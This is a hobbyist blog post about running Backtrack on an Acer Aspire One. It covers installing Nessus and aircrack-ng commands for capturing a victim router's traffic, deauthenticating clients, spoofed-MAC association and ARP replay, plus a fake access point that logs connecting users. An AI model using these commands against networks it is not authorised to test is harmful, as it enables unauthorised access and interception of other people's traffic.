Introduction
After getting my netbook what to do next? Hmmm maybe taking advance of its great Atheros card to "play" for a while?? alright!! In this post I will write tips and tricks and howtos to take advance of the Backtrack security distro http://www.remote-exploit.org/backtrack.html for fun.After getting my netbook what to do next? Hmmm maybe taking advance of its great Atheros card to "play" for a while?? alright!! In this post I will write tips and tricks and howtos to take advance of the Backtrack security distro http://www.remote-exploit.org/backtrack.html for fun.
Contents
- Backtrack 3/4 on Acer Aspire One
- Introduction
- Installation on a Hard Drive
- Installing Nessus
- Playing with Wireless
- First steps
- Starting kismet
- Create a new interface with monitor mode enabled
- Capturing packets focusing on one AP
- Send disasociation frames to a specific client (connected)
- Replaying arp packets
- Debuggin network traces with tcpdump
- Connect to a Wep protected network
- Startup a fake access point to share your internet access
- Software AP with airbase-ng
- Other stuff
- Links
- Introduction
Installation on a Hard Drive
You can run Backtrack3 from a pendrive as a live cd system without problems but you can also copy it to your hard drive and keep the changes after every reboot.
To do so just follow this howto which I find great: http://kin.calvin.free.fr/blog/?p=16. In my case I kept the boot loader that comes with the Linpus distro installed originally. As you can see in my post about this netbook, Grub has a weird behaviour when you want to boot more than one system (check AspireOnePost).
Having this in mind go to the Grub configuration file that should be on /boot/grub/grub.conf and add the following lines after the Linpus Linux booting parameters, I will also show the parameters for booting Windows in case you also want to install it. Take care with the partition numbers as they dont have to be the same as mine.
default=0 timeout=5 splashimage=(hd0,0)/boot/grub/cbg2.xpm.gz hiddenmenu title Linpus Linux rootnoverify (hd0,0) kernel /boot/bzImage ro root=LABEL=linpus vga=0x311 splash=quiet loglevel=1 console=tty1 nolapic_timer initrd /boot/initrd-splash.img title Backtrack 3 rootnoverify (hd0,1) kernel /boot/vmlinuz ro root=/dev/sda2 vga=0x0F05 title Windous XP root (hd0,2) makeactive chainloader +1
Keep an eye on the grub syntax ((hd0,0) refers to the first partition on the first disk). Thus you can see how Backtrack was installed on the second partition.
Installing Nessus
Fulfill the requirement that you are a home user you can use the Vulnerability Scanner Nessus by doing the following:
- Download the Nessus and NessusClient Fedora Core 8 RPM’s from the Nessus website, it's important to choose the Fedora 8 binaries.
- Convert them to TGZ
rpm2tgz Nessus-3.2.x-fc8.i386.rpm rpm2tgz NessusClient-3.2.x-fc8.i386.rpm
- Use the pkgtool (in that same directory where you downloaded the client and server) to have a ncurses interface that will install those two packages:
pkgtool
- Configure things a bit (put the libraries where appropriate and so on):
cd /opt/ export PATH=$PATH:/opt/nessus/sbin:/opt/nessus/bin: cp /usr/lib/libssl.so /lib cp /usr/lib/libcrypto.so /lib cp /opt/nessus/lib/libnessus.so.3 /lib cp /opt/nessus/lib/libnessusrx.so.0 /lib cp /opt/nessus/lib/libpcap-nessus.so.3 /lib cd /lib ln libssl.so libssl.so.6 ln libcrypto.so libcrypto.so.6 echo "/opt/nessus/lib" >> /etc/ld.so.conf ldconfig
- Then add your users that can use Nessus (it requires authentication).
/opt/nessus/sbin/nessus-mkcert /opt/nessus/sbin/nessus-adduser
- Finally register Nessus and with the key that they will provide you update the plugins this way (note: it takes some time to update all plugins).
cd /opt/nessus/etc/nessus nessus-fetch –register XXX-YYY-ZZZ-VVV
- To run the server just type
/opt/nessus/sbin/nessusd
The client should be located on your Internet applications menu or in this path:
/opt/nessus/bin/NessusClient
Playing with Wireless
First steps
Aspire one comes with a nice Atheros wireless card and Backtrack3 has the drivers needed to put the card in monitor mode (sniff) or to reinject packets. To use all this functionality you should get used to wlanconfig,airmon-ng, aircrack-ng and aireplay-ng tools.
Starting kismet
First you have to edit its config file and modify the follogin line:
vi /usr/local/etc/kismet.conf source=madwifi_ag,wifi0,madwifi-ng #afterwards just launch kismet: kismet
Kismet will create a dedicated new interface, If you are capturing packets on certain channel with another interface kismet will make trouble and start channel hopping on the other interfaces in use, so take care when running kismet and for example airodump-ng.
Create a new interface with monitor mode enabled
airmon-ng stop ath0 airmon-ng start wifi0
Capturing packets focusing on one AP
airodump-ng --bssid <victim_router_mac> -c <channel_used_by_victim_router> -w <file> <wireless_iface>
Send disasociation frames to a specific client (connected)
aireplay-ng -0 5 -e <ESSID> -a <router_mac> -c <connected_client_mac> <wifi_iface>
Replaying arp packets
In order for the replay to be effective you have to be associated with de ap, you can achieve this by issuing, where fake mac is the mac of an already connected user. Otherwise if you are replaying packets of a non associated client the AP will discard them.
aireplay-ng -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
Some APs like this format of association
aireplay-ng -1 6000 -o 1 -q 10 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
Where:
- 6000 - Reauthenticate every 6000 secs
- -o 1 - Send only one type of packet each time, by default different types of association frames are sent that could mislead the AP.
- -q 10 - Send keepalive packets every 10 secs. keepalive <> reauthentication
Debuggin network traces with tcpdump
tcpdump -n -e -s0 -vvv -i <iface> 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e: 40:80 DeAuthentication: Class 3 frame received from nonassociated station
Connect to a Wep protected network
iwconfig ath0 key <s:ASCII string of key> essid <essid> dhclient ath0
Startup a fake access point to share your internet access
Modify it for your needs (networks, essid, ips, gw, etc).
- LAN == ETH0 (ethernet)
- WAN == ATH0 (wireless)
- 10.0.0.0/24 == ATH0 LAN
- 192.168.1.0/24 == ETH0 LAN
- 192.168.1.1 == ETH0 GATEWAY
- 10.0.0.1 == ATH0 GATEWAY (the Aspire one)
Note: from Backtrack 4 release wlanconfig command to put the wireless card in master or ap mode won't work as by default it will load ath5k driver which doess not support ioctl calls. You can still manage to get a fake ap by using airbase-ng script. Otherwise install by hand the madwifi ath_pci driver http://forums.remote-exploit.org/backtrack-4-non-working-hardware/24348-atheros-ar5007eg-ath_pci-error.html
IPT="/usr/sbin/iptables" WAN="eth0" LAN="ath0" #wifi stuff echo "destroying atheros ifaces" wlanconfig ath1 destroy wlanconfig ath0 destroy echo "creating ath0 as a master device" wlanconfig ath0 create wlandev wifi0 wlanmode master sleep 2 iwconfig ath0 essid HOME echo "configuring IPs and default route" ifconfig ath0 10.0.0.1 netmask 255.255.255.0 up ifconfig eth0 192.168.1.111 netmask 255.255.255.0 up route add default gw 192.168.1.1 echo "starting dhcp" /etc/rc.d/rc.dhcpd start echo "enabling forwarding" echo 1 > /proc/sys/net/ipv4/ip_forward echo "stablishing IPtables nat rules" $IPT -t nat -A POSTROUTING -o $WAN -j MASQUERADE
The dhcp server config I used is the following
bt ~ # cat /etc/dhcpd.conf option domain-name-servers 4.2.2.2; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 4.2.2.2; }
As you can see I used the local7 facility that I will dump to a separate file I will monitor to check when I have dear guests:
bt ~ # cat /etc/syslog.conf # /etc/syslog.conf # For info about the format of this file, see "man syslog.conf" # and /usr ... ... .... # #DHCP LOGS # local7.* -/var/log/dhcp.log
Software AP with airbase-ng
Airbase-ng aim is to respond to any probe packet from connecting clients, we can use it to start a fake AP that listens to one essid at a time. Maybe this can be useful to do when you just run backtrack 4 final on aspire one and you see that wlanconfig suite of commands do not work.
//we create a monitor mode interface (mon0 will be created) airmon-ng start wlan0 //start our fake ap listening on channel 5, beaconing each 100 milliseconds, publising a "test" essid airbase-ng -I 100 -c 5 --essid test mon0 //at0 inteface will be created like in previous post we can setup a dhcp server so that it listens on at0 interface.
Other stuff
To remove an interface (when wlanconfig stop does not work due to ath5k use) we can achieve like this: iw dev mon0 interface del To lock the card to a specific mode, use: * iwpriv ath0 mode 11a To lock to 11a only. * iwpriv ath0 mode 11b To lock to 11b only. * iwpriv ath0 mode 11g To lock to 11g only. * iwpriv ath0 mode 0 (default) autoselect mode. Changing Authentication Mode. Use: * iwpriv ath0 authmode 1 To use open authentication. * iwpriv ath0 authmode 2 To use shared key authentication. * iwpriv ath0 authmode 3 To use 802.1x authentication. Manipulating the MAC white/black list Use: * iwpriv ath0 maccmd 3 To clear the MAC list. * iwpriv ath0 maccmd 1 To make the list a whitelist. * iwpriv ath0 maccmd 2 To make the list a blacklist. * iwpriv ath0 addmac 00:11:22:33:44:55 To add a mac address to the list. * iwpriv ath0 delmac 00:11:22:33:44:55 To delete a mac from the list. * iwpriv ath0 kickmac 00:11:22:33:44:55 To send a disassociation frame to an associated station.
Links
- BT3 installation to hard disk http://kin.calvin.free.fr/blog/?p=16
- Installing nessus http://www.voipsec.eu/?p=205
- Interesting post (spanish): http://kungfoosion.blogspot.com/2009/11/karmetasploit-en-backtrack-4.html
- Another interesting post (spanish) includes launching some nice tools: http://opensec.es/2009/10/05/creando-un-punto-de-acceso-falso-ii/
- A bit of information about the 3 types of madwifi drivers http://www.guatewireless.org/internetworking/redes/wireless/madwifi-instalando-atheros-wireless-card-sobre-linux/
- Funniest ever: http://www.ex-parrot.com/~pete/upside-down-ternet.html
No comments:
Post a Comment